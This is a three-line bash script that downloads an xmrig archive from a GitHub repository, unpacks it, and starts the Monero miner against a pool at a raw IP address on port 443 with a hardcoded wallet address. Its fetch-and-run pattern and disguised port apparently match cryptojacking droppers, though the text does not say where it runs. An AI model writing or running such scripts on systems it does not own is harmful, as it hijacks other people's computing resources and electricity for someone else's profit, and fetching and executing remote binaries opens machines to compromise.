#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 188.166.216.79:443 -u SaLvs8ATgdaDmV348aLgyScmCtzuTeGfyFTYJQyXrmRrY815rRsPzxyD8kBRvdGwHfAbtXikAWGK54Lu9R8NDX8B58WHgyTYgV4 -p TNdik -a rx/0
